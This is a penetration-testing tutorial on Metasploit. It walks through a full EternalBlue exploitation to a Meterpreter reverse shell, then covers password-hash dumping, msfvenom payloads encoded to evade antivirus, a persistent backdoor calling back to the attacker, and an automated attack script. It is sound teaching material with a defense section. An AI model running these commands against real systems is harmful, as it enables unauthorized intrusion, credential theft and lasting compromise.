# **The Complete Guide to Metasploit Framework: Installation, Usage, and Practical Techniques**
Metasploit Framework is one of the most powerful penetration testing tools in Kali Linux, developed and maintained by Rapid7. It integrates vulnerability exploitation, payload generation, post-exploitation modules, and more, widely used for security assessments, red team exercises, and vulnerability research.
---
## **1. Introduction to Metasploit Framework**
Metasploit is an open-source penetration testing framework with the following core components:
- **Exploits**: Attack code targeting known vulnerabilities (e.g., EternalBlue, Heartbleed).
- **Payloads**: Code executed after a successful attack (e.g., reverse shell, Meterpreter).
- **Auxiliary Modules**: Non-exploitation modules for information gathering, scanning, DoS attacks, etc.
- **Post-Exploitation Modules**: Privilege escalation, lateral movement, data exfiltration, etc.
**Use Cases**:
- Penetration testing
- Vulnerability validation (PoC)
- Security research
- Red team operations
---
## **2. Installing Metasploit Framework**
### **On Kali Linux**
Kali Linux comes with Metasploit preinstalled, but you can update it manually:
```bash
sudo apt update && sudo apt install metasploit-framework
msfupdate # Update Metasploit
```
### **On Ubuntu/Debian**
```bash
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod +x msfinstall
./msfinstall
```
### **On Windows/macOS**
- **Windows**: Download the [Metasploit Pro trial](https://www.metasploit.com/) or use Kali WSL.
- **macOS**: Install via Homebrew:
```bash
brew install metasploit
```
---
## **3. Basic Usage of Metasploit**
### **Starting Metasploit**
```bash
msfconsole # Launch the interactive console
```
### **Common Commands**
| Command | Description |
|------|------|
| `help` | View help |
| `search [keyword]` | Search for exploits/modules (e.g., `search eternalblue`) |
| `use [module path]` | Load a module (e.g., `use exploit/windows/smb/ms17_010_eternalblue`) |
| `show options` | View current module configuration options |
| `set [option] [value]` | Set parameters (e.g., `set RHOSTS 192.168.1.100`) |
| `exploit` or `run` | Execute the attack |
| `sessions -l` | List active sessions |
| `sessions -i [ID]` | Interact with a session (e.g., `sessions -i 1`) |
---
## **4. Practical Example: Exploiting EternalBlue on Windows**
### **Step 1: Scan the Target**
```bash
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 192.168.1.100
run
```
If the output shows `VULNERABLE`, the target is exploitable.
### **Step 2: Exploit the Vulnerability to Get a Meterpreter Shell**
```bash
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.100
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.50 # Your Kali IP
exploit
```
Upon success, you’ll enter a `meterpreter` session.
### **Step 3: Post-Exploitation Actions**
```bash
sysinfo # View system info
getuid # Check current privileges
hashdump # Extract password hashes
screenshot # Take a screenshot
shell # Enter system shell
upload /path/file # Upload a file
```
---
## **5. Advanced Techniques**
### **1. Generating Payloads with AV Evasion**
```bash
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f exe -o payload.exe
```
Use encoders (e.g., `shikata_ga_nai`) to improve evasion:
```bash
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe -o payload_encoded.exe
```
### **2. Creating Persistent Backdoors**
```bash
run persistence -X -i 10 -p 4444 -r 192.168.1.50
```
- `-X`: Auto-start on boot
- `-i 10`: Reconnect every 10 seconds
- `-p 4444`: Listening port
### **3. Automated Attacks (Resource Scripts)**
Create a script `autoattack.rc`:
```
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.100
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.50
exploit -j
```
Run it with:
```bash
msfconsole -r autoattack.rc
```
---
## **6. Defense Measures**
- **Patch promptly**: Metasploit relies on exploits; patching systems mitigates risks.
- **Disable unnecessary services** (e.g., SMBv1).
- **Use EDR/XDR solutions** (e.g., CrowdStrike, Microsoft Defender ATP).
- **Monitor unusual network connections** (e.g., Meterpreter reverse shells).
---
## **7. Learning Resources**
- **Official Docs**: [Metasploit Documentation](https://docs.metasploit.com/)
- **Books**: *The Metasploit Penetration Testing Guide*
- **Practice Labs**: [VulnHub](https://www.vulnhub.com/), [Hack The Box](https://www.hackthebox.com/)
---
## **Conclusion**
Metasploit Framework is a core tool for penetration testing, enabling efficient vulnerability exploitation, privilege escalation, and lateral movement. However, **use it only for authorized testing** to avoid legal issues. Practice in lab environments (e.g., VirtualBox + Metasploitable) for skill development.